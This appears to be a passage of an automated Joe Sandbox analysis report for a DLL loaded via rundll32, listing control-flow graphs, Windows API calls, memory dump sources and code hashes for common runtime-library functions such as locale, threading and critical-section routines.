                                                                                                                                            control_flow_graph 1227 1800fa160-1800fa1b9 call 1800efaf4 1230 1800fa1cf-1800fa1d9 1227->1230 1231 1800fa1bb-1800fa1ca call 1800fa0c4 1227->1231 1233 1800fa1db-1800fa1e2 1230->1233 1234 1800fa228 call 1800f99b4 1230->1234 1231->1230 1235 1800fa1eb call 1800f9b2c 1233->1235 1236 1800fa1e4-1800fa1e9 call 1800f9a5c 1233->1236 1239 1800fa22d-1800fa231 1234->1239 1244 1800fa1f0-1800fa1f4 1235->1244 1236->1244 1242 1800fa39c 1239->1242 1243 1800fa237-1800fa23a 1239->1243 1248 1800fa39e-1800fa3bc 1242->1248 1245 1800fa23c-1800fa240 1243->1245 1246 1800fa254-1800fa267 call 1800f9f9c 1243->1246 1244->1243 1247 1800fa1f6-1800fa20c call 1800fa0c4 1244->1247 1245->1246 1249 1800fa242-1800fa24a 1245->1249 1254 1800fa26c-1800fa270 1246->1254 1247->1239 1255 1800fa20e-1800fa218 1247->1255 1249->1246 1252 1800fa24c-1800fa252 GetACP 1249->1252 1252->1254 1254->1242 1256 1800fa276-1800fa27b 1254->1256 1257 1800fa21a-1800fa21f call 1800f9a5c 1255->1257 1258 1800fa221-1800fa226 call 1800f9b2c 1255->1258 1256->1242 1259 1800fa281-1800fa28c IsValidCodePage 1256->1259 1257->1239 1258->1239 1259->1242 1261 1800fa292-1800fa295 1259->1261 1264 1800fa29a-1800fa29d 1261->1264 1265 1800fa297 1261->1265 1267 1800fa37f-1800fa384 1264->1267 1268 1800fa2a3-1800fa2ae 1264->1268 1265->1264 1267->1248 1269 1800fa2b2-1800fa2ba 1268->1269 1269->1269 1270 1800fa2bc-1800fa2d1 call 1800eb918 1269->1270 1273 1800fa3bd-1800fa3ca 1270->1273 1274 1800fa2d7-1800fa2ed call 1800f0328 1270->1274 1276 1800fa3cc call 1800dbd80 1273->1276 1274->1242 1280 1800fa2f3-1800fa312 call 1800f0328 1274->1280 1278 1800fa3d1-1800fa457 call 1800efaf4 * 2 call 1800fa988 GetLocaleInfoW 1276->1278 1291 1800fa460-1800fa473 call 1800dbf98 1278->1291 1292 1800fa459-1800fa45e 1278->1292 1280->1242 1286 1800fa318-1800fa328 call 1800d735c 1280->1286 1293 1800fa33a-1800fa351 call 1800f0328 1286->1293 1294 1800fa32a-1800fa338 call 1800d735c 1286->1294 1305 1800fa495-1800fa49c 1291->1305 1306 1800fa475 1291->1306 1296 1800fa49f-1800fa4c7 call 1800d5000 1292->1296 1293->1242 1303 1800fa353-1800fa360 1293->1303 1294->1293 1294->1303 1307 1800fa386-1800fa39a call 1800fe4c8 1303->1307 1308 1800fa362-1800fa37d call 1800eb918 1303->1308 1305->1296 1309 1800fa47c-1800fa47f 1306->1309 1307->1267 1308->1267 1308->1273 1309->1305 1312 1800fa481-1800fa48a 1309->1312 1312->1309 1315 1800fa48c-1800fa492 1312->1315 1315->1305
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                            • String ID: utf8
                                                                                                                                            • API String ID: 3069159798-905460609
                                                                                                                                            • Opcode ID: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                            • Instruction ID: 411b108c764d4ace3e5c45deb51a3e56b7a9faa629776dbc87eeee4caed17a46
                                                                                                                                            • Opcode Fuzzy Hash: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                            • Instruction Fuzzy Hash: D591697230878986FBA69B25D4413E923A5F78EBC0F44C129AE48477C6EF79CB59D340
                                                                                                                                            Function 00000001800FABBC Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1316 1800fabbc-1800fac24 call 1800efaf4 * 2 1321 1800fac26-1800fac2a 1316->1321 1322 1800fac43-1800fac51 1316->1322 1321->1322 1323 1800fac2c-1800fac3e call 1800fab3c 1321->1323 1324 1800faccc-1800facd2 1322->1324 1325 1800fac53-1800fac57 1322->1325 1323->1322 1328 1800fad25-1800fad35 GetUserDefaultLCID 1324->1328 1329 1800facd4-1800facd8 1324->1329 1325->1324 1327 1800fac59-1800fac5f 1325->1327 1331 1800fac72-1800fac76 call 1800fa598 1327->1331 1332 1800fac61-1800fac65 1327->1332 1330 1800fad38-1800fad3c 1328->1330 1329->1328 1333 1800facda-1800face6 call 1800efaf4 1329->1333 1334 1800fae1d 1330->1334 1335 1800fad42-1800fad5f call 1800fa9d8 1330->1335 1342 1800fac7b-1800fac7f 1331->1342 1332->1331 1336 1800fac67-1800fac70 call 1800fa4c8 1332->1336 1348 1800faced-1800facf5 1333->1348 1340 1800fae1f-1800fae39 call 1800d5000 1334->1340 1335->1334 1349 1800fad65-1800fad70 IsValidCodePage 1335->1349 1336->1342 1342->1335 1347 1800fac85-1800faca2 call 1800fab3c 1342->1347 1347->1330 1356 1800faca8-1800facae 1347->1356 1348->1348 1352 1800facf7-1800fad1d EnumSystemLocalesW 1348->1352 1349->1334 1355 1800fad76-1800fad86 IsValidLocale 1349->1355 1352->1330 1354 1800fad1f-1800fad23 1352->1354 1354->1330 1355->1334 1357 1800fad8c-1800fad8f 1355->1357 1358 1800facb0-1800facb4 1356->1358 1359 1800facc1-1800facca call 1800fa598 1356->1359 1360 1800fad94-1800fadb0 call 1800f04f8 1357->1360 1361 1800fad91 1357->1361 1358->1359 1362 1800facb6-1800facbf call 1800fa4c8 1358->1362 1359->1330 1369 1800fae16-1800fae1b 1360->1369 1370 1800fadb2-1800fade2 call 1800f04f8 GetLocaleInfoW 1360->1370 1361->1360 1362->1330 1369->1340 1370->1334 1373 1800fade4-1800fadfe GetLocaleInfoW 1370->1373 1373->1334 1374 1800fae00-1800fae11 call 1800fe4c8 1373->1374 1374->1369
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2591520935-0
                                                                                                                                            • Opcode ID: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                            • Instruction ID: 38b54266c759988556cf6e83805a3aea8ac390e25c82b98d870ebd1b39842dbf
                                                                                                                                            • Opcode Fuzzy Hash: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                            • Instruction Fuzzy Hash: C571ACB2704B588AFB969B60C4547EC33A0BB4EB84F44C429AE0A577C5EF38DA49D350
                                                                                                                                            Function 00000001800D2C10 Relevance: 9.1, APIs: 6, Instructions: 94libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2238633743-0
                                                                                                                                            • Opcode ID: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                            • Instruction ID: 5042ef007f360a4cb06860ac3989e26b2bf5c698eccc4f75d7074bb1ae39fa3f
                                                                                                                                            • Opcode Fuzzy Hash: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                            • Instruction Fuzzy Hash: 2B411872605B8885EF9B8F22E5543AC67A0B76CFC4F18D121EE4A17B55DF3CCA698310
                                                                                                                                            Function 00000001800DBA64 Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandledVirtual$AllocNumaUnwind
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4171051170-0
                                                                                                                                            • Opcode ID: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                            • Instruction ID: 89a1bc4f4d59436b05440924b1a16579084504f17a163dcabdca63123fb111a8
                                                                                                                                            • Opcode Fuzzy Hash: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                            • Instruction Fuzzy Hash: 1E317332214F8486DBA1CF25E8843DE73A4F7887A4F544216EE9D43BA9DF78C649CB10
                                                                                                                                            Function 00000001800D65BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001800D663F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DebugErrorLastOutputString
                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                            • API String ID: 4132100945-631824599
                                                                                                                                            • Opcode ID: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                            • Instruction ID: 283167450af4393c368174901eda81c10499684aeee4801c6a5cb384dfff630c
                                                                                                                                            • Opcode Fuzzy Hash: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                            • Instruction Fuzzy Hash: 55117732610B4497FB869B22E5493D932A1FB58755F40D115E64983A60EF78D278C710
                                                                                                                                            Function 00000001800EFAF4 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                            • Opcode ID: be5eafdf0d6c21224e5684ca46b1bc47f03edf9f52fd97c148a08c08acd9a924
                                                                                                                                            • Instruction ID: 9ec4bcfaacd67bd7be5f2c6c23ff2cc11b1865c540bc1b41079cacaeb76c1345
                                                                                                                                            • Opcode Fuzzy Hash: be5eafdf0d6c21224e5684ca46b1bc47f03edf9f52fd97c148a08c08acd9a924
                                                                                                                                            • Instruction Fuzzy Hash: 98416F3030468D42FAEB673199A53FD52425F4D7F0F65C728BA366ABD2DE289B4D9300
                                                                                                                                            Function 0000000180041E70 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 170COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Concurrency::cancel_current_taskLockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                            • String ID: bad locale name$false$true
                                                                                                                                            • API String ID: 461674175-1062449267
                                                                                                                                            • Opcode ID: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
                                                                                                                                            • Instruction ID: 7f4c0dd69d64a2e519a89c0408eed1bde46919adf4286db9a4fea514131e2538
                                                                                                                                            • Opcode Fuzzy Hash: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
                                                                                                                                            • Instruction Fuzzy Hash: 39718032701B448AFB96DFB0D4913DC33B5EB48788F458129AE4967B5ADF34C619C398
                                                                                                                                            Function 0000000180099560 Relevance: 13.9, APIs: 9, Instructions: 407synchronizationthreadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 517 180099560-18009957e 518 1800995be-1800995d0 517->518 519 180099580-18009959e WaitForSingleObject GetExitCodeThread 517->519 520 1800995e9-1800995ed 518->520 521 1800995d2-1800995d5 518->521 522 1800995aa-1800995b3 519->522 523 1800995a0-1800995a6 GetLastError 519->523 526 1800995f3-1800995f6 520->526 527 1800996a5-1800996b4 520->527 524 1800995dd-1800995e0 521->524 525 1800995d7-1800995db 521->525 522->518 523->522 528 1800995e3-1800995e7 524->528 525->528 526->527 529 1800995fc-1800995ff 526->529 528->520 528->521 529->527 531 180099605-18009961c 529->531 532 18009961e-180099622 531->532 533 180099635-180099641 531->533 534 1800996bb-180099703 call 180014890 call 1800d7ba8 532->534 535 180099628-18009962e 532->535 536 180099643-18009964b 533->536 537 180099665-18009966d 533->537 556 180099712-180099760 call 1800d505c call 180016e10 534->556 557 180099705-18009970c 534->557 535->533 538 18009967c-180099696 call 18003c080 536->538 540 18009964d 536->540 537->538 539 18009966f 537->539 550 1800996b5-1800996ba call 180014880 538->550 551 180099698-1800996a0 call 1800d504c 538->551 542 180099670-18009967a 539->542 544 180099650-180099654 540->544 542->538 542->542 544->538 547 180099656-180099661 544->547 547->544 552 180099663 547->552 550->534 551->527 552->538 564 18009976c-18009976f 556->564 565 180099762-180099769 556->565 557->556 559 18009986d-180099886 557->559 566 18009977f-180099782 564->566 567 180099771-18009977e call 1800d504c 564->567 565->564 569 180099868-18009986b 566->569 570 180099788-1800997a2 566->570 567->566 569->559 572 180099887-18009988c call 180014880 569->572 573 1800997cb-1800997cf 570->573 574 1800997a4-1800997ac 570->574 581 18009988d-1800998ee call 18000b550 call 180099b90 572->581 577 1800997db-1800997e9 573->577 578 1800997d1-1800997d5 573->578 575 1800997ae-1800997b6 574->575 576 1800997b8-1800997c2 574->576 580 1800997c5-1800997c9 575->580 576->580 577->581 582 1800997ef-180099825 call 1800d505c 577->582 578->569 578->577 580->573 580->574 593 1800998f0-180099908 EnterCriticalSection 581->593 589 180099837 582->589 590 180099827-180099835 582->590 592 18009983b-180099867 call 18000fdb0 589->592 590->592 592->569 595 18009990e-180099912 593->595 596 180099a73-180099ac5 593->596 598 180099a68-180099a6d 595->598 599 180099918-180099922 595->599 600 180099ad8-180099add 596->600 601 180099ac7-180099acf 596->601 598->596 606 180099b2a-180099b2f 598->606 604 180099929-180099948 QueryPerformanceCounter 599->604 605 180099924-180099927 599->605 602 180099adf-180099ae3 600->602 603 180099ae5 600->603 601->600 607 180099ae9-180099b0b LeaveCriticalSection 602->607 603->607 611 18009994e-180099958 604->611 612 180099b64-180099b86 call 180014890 call 1800d7ba8 604->612 610 180099998-18009999b 605->610 608 180099b40-180099b63 LeaveCriticalSection 606->608 609 180099b31-180099b3f call 180099560 606->609 607->593 624 180099b11-180099b25 607->624 609->608 617 1800999a0-1800999a5 610->617 615 18009995a-18009997a QueryPerformanceFrequency 611->615 616 180099980-180099992 611->616 615->612 615->616 616->610 616->612 621 1800999ab-1800999af 617->621 622 180099a64 617->622 621->622 623 1800999b5-1800999dc 621->623 622->598 623->610 629 1800999de-1800999fd QueryPerformanceCounter 623->629 624->593 630 1800999ff-180099a02 629->630 631 180099a04-180099a0e 629->631 632 180099a43-180099a5e 630->632 633 180099a10-180099a2a QueryPerformanceFrequency 631->633 634 180099a31-180099a40 631->634 632->617 632->622 633->634 635 180099a2c-180099a2f 633->635 634->632 635->632
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CodeErrorExitLastObjectSingleThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 113644094-0
                                                                                                                                            • Opcode ID: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
                                                                                                                                            • Instruction ID: d4a4ad110a7379173bcc36970285a8a200778f275078fe0ae0b16c97a83e6880
                                                                                                                                            • Opcode Fuzzy Hash: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
                                                                                                                                            • Instruction Fuzzy Hash: E702AF72606B8885EB96CFA9E4443ED77A5F788BD8F148115EE4D03BA4DF78C649C340
                                                                                                                                            Function 00000001800990C0 Relevance: 13.8, APIs: 9, Instructions: 313synchronizationthreadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 636 1800990c0-1800990e4 637 18009915a-1800991fb call 180014880 EnterCriticalSection call 1800d505c 636->637 638 1800990e6-1800990ee 636->638 650 1800991fd 637->650 651 180099228-18009922c 637->651 638->637 639 1800990f0-180099101 638->639 642 180099154-180099159 call 180014880 639->642 643 180099103-180099153 call 1800b1ec0 call 1800d504c call 1800b0fe0 DeleteCriticalSection 639->643 642->637 653 180099203-18009920a 650->653 655 18009922e-180099237 651->655 656 18009923d-18009924b 651->656 657 18009920c-180099213 653->657 658 180099215-18009921f 653->658 655->656 660 1800992cc-1800992ef LeaveCriticalSection 655->660 661 1800993fb-180099400 call 18000b550 656->661 662 180099251-180099296 call 1800d505c 656->662 664 180099222-180099226 657->664 658->664 671 180099389-180099395 660->671 672 1800992f5-1800992fc 660->672 670 180099401-180099451 call 180014880 EnterCriticalSection 661->670 673 1800992a1-1800992c7 call 18000fdb0 662->673 674 180099298-18009929e 662->674 664->651 664->653 690 18009945b-180099467 670->690 691 180099453-180099456 670->691 677 1800993da-1800993fa call 1800d504c 671->677 678 180099397 671->678 679 1800992fe-18009931b WaitForSingleObject GetExitCodeThread 672->679 680 180099333-18009933b 672->680 673->660 674->673 682 1800993a0-1800993c4 call 1800b1ec0 678->682 683 18009931d-180099323 GetLastError 679->683 684 180099326-18009932f 679->684 685 18009933d-180099345 680->685 686 18009935f-180099369 680->686 682->670 706 1800993c6-1800993d4 call 1800d504c 682->706 683->684 684->680 693 18009935a-18009935d 685->693 694 180099347-18009934b 685->694 688 18009936b 686->688 689 18009937f-180099383 686->689 696 180099370-18009937d 688->696 689->671 689->672 698 180099469-180099474 690->698 699 18009947f-1800994b8 690->699 697 18009952c-18009952e 691->697 693->689 694->693 702 18009934d-180099358 694->702 696->689 696->696 703 180099539-18009955b 697->703 704 180099530-180099533 LeaveCriticalSection 697->704 698->699 705 180099476-18009947a call 18003d480 698->705 707 1800994ba-1800994d2 call 1800d505c 699->707 708 1800994d7-180099506 699->708 702->693 702->694 704->703 705->699 706->682 718 1800993d6 706->718 707->708 712 180099510-180099529 LeaveCriticalSection 708->712 713 180099508-18009950b call 1800996e0 708->713 712->697 713->712 718->677
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$CodeDeleteErrorExitLastObjectSingleThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4073839270-0
                                                                                                                                            • Opcode ID: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
                                                                                                                                            • Instruction ID: e66330fb568cf6e2aa5611fb903b84894a8c80f55f8b343ffe77ccc30def8a2f
                                                                                                                                            • Opcode Fuzzy Hash: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
                                                                                                                                            • Instruction Fuzzy Hash: 62E15A32601B489AEB92CF65E4443DC37B5F348B98F558126EB8D47B95DF38C6A9C340
                                                                                                                                            Function 000000018009BAC0 Relevance: 13.8, APIs: 9, Instructions: 252COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CAA
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CB8
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CC6
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099D13
                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BB64
                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BC71
                                                                                                                                              • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D508C
                                                                                                                                              • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D5092
                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BD04
                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 000000018009BDFA
                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BEA7
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF62
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF94
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF9F
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BFAA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
